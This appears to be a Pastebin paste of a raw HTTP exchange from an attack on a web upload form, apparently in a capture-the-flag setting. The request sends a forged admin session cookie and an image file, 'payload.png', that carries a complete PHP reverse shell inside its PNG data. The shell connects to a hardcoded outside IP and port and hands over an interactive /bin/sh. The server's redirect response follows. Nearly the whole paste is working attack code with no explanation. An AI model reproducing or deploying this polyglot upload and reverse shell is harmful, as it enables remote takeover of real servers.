Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- POST / HTTP/1.1
- Host: 138.68.187.191:1337
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate
- Referer: http://138.68.187.191:1337/
- Content-Type: multipart/form-data; boundary=---------------------------20501827029678
- Content-Length: 3965
- Connection: keep-alive
- Cookie: session=eyJ1c2VybmFtZSI6ImFkbWluIn0.XLCPLQ.YxytijoFlpOqpx74Wzd_Q5TtucU
- Upgrade-Insecure-Requests: 1
- -----------------------------20501827029678
- Content-Disposition: form-data; name="file"; filename="payload.png"
- Content-Type: image/png
- .PNG
- .
- ...
- IHDR... ... ............ pHYs..........+.....`IDATH.c\<?<?php
- <?php
- set_time_limit (0);
- $VERSION = "1.0";
- $ip = '34.242.79.196'; // CHANGE THIS
- $port = 1234; // CHANGE THIS
- $chunk_size = 1400;
- $write_a = null;
- $error_a = null;
- $shell = 'uname -a; w; id; /bin/sh -i';
- $daemon = 0;
- $debug = 0;
- //
- // Daemonise ourself if possible to avoid zombies later
- //
- // pcntl_fork is hardly ever available, but will allow us to daemonise
- // our php process and avoid zombies. Worth a try...
- if (function_exists('pcntl_fork')) {
- // Fork and have the parent process exit
- $pid = pcntl_fork();
- if ($pid == -1) {
- printit("ERROR: Can't fork");
- exit(1);
- }
- if ($pid) {
- exit(0); // Parent exits
- }
- // Make the current process a session leader
- // Will only succeed if we forked
- if (posix_setsid() == -1) {
- printit("Error: Can't setsid()");
- exit(1);
- }
- $daemon = 1;
- } else {
- printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
- }
- // Change to a safe directory
- chdir("/");
- // Remove any umask we inherited
- umask(0);
- //
- // Do the reverse shell...
- //
- // Open reverse connection
- $sock = fsockopen($ip, $port, $errno, $errstr, 30);
- if (!$sock) {
- printit("$errstr ($errno)");
- exit(1);
- }
- // Spawn shell process
- $descriptorspec = array(
- 0 => array("pipe", "r"), // stdin is a pipe that the child will read from
- 1 => array("pipe", "w"), // stdout is a pipe that the child will write to
- 2 => array("pipe", "w") // stderr is a pipe that the child will write to
- );
- $process = proc_open($shell, $descriptorspec, $pipes);
- if (!is_resource($process)) {
- printit("ERROR: Can't spawn shell");
- exit(1);
- }
- // Set everything to non-blocking
- // Reason: Occsionally reads will block, even though stream_select tells us they won't
- stream_set_blocking($pipes[0], 0);
- stream_set_blocking($pipes[1], 0);
- stream_set_blocking($pipes[2], 0);
- stream_set_blocking($sock, 0);
- printit("Successfully opened reverse shell to $ip:$port");
- while (1) {
- // Check for end of TCP connection
- if (feof($sock)) {
- printit("ERROR: Shell connection terminated");
- break;
- }
- // Check for end of STDOUT
- if (feof($pipes[1])) {
- printit("ERROR: Shell process terminated");
- break;
- }
- // Wait until a command is end down $sock, or some
- // command output is available on STDOUT or STDERR
- $read_a = array($sock, $pipes[1], $pipes[2]);
- $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
- // If we can read from the TCP socket, send
- // data to process's STDIN
- if (in_array($sock, $read_a)) {
- if ($debug) printit("SOCK READ");
- $input = fread($sock, $chunk_size);
- if ($debug) printit("SOCK: $input");
- fwrite($pipes[0], $input);
- }
- // If we can read from the process's STDOUT
- // send data down tcp connection
- if (in_array($pipes[1], $read_a)) {
- if ($debug) printit("STDOUT READ");
- $input = fread($pipes[1], $chunk_size);
- if ($debug) printit("STDOUT: $input");
- fwrite($sock, $input);
- }
- // If we can read from the process's STDERR
- // send data down tcp connection
- if (in_array($pipes[2], $read_a)) {
- if ($debug) printit("STDERR READ");
- $input = fread($pipes[2], $chunk_size);
- if ($debug) printit("STDERR: $input");
- fwrite($sock, $input);
- }
- }
- fclose($sock);
- fclose($pipes[0]);
- fclose($pipes[1]);
- fclose($pipes[2]);
- proc_close($process);
- // Like print, but does nothing if we've daemonised ourself
- // (I can't figure out how to redirect STDOUT like a proper daemon)
- function printit ($string) {
- if (!$daemon) {
- print "$string\n";
- }
- }
- ?>
- ?>X....s^7.....~_.}.'....._..|.00c..g..=..2..Q0
- F.(...`...Q0
- .
- .......x
- .....IEND.B`.
- -----------------------------20501827029678--
- HTTP/1.0 302 FOUND
- Content-Type: text/html; charset=utf-8
- Content-Length: 209
- Location: http://138.68.187.191:1337/
- Server: Werkzeug/0.14.1 Python/2.7.15rc1
- Date: Sun, 14 Apr 2019 20:20:11 GMT
- <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
- <title>Redirecting...</title>
- <h1>Redirecting...</h1>
- <p>You should be redirected automatically to target URL: <a href="/">/</a>. If not click the link.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement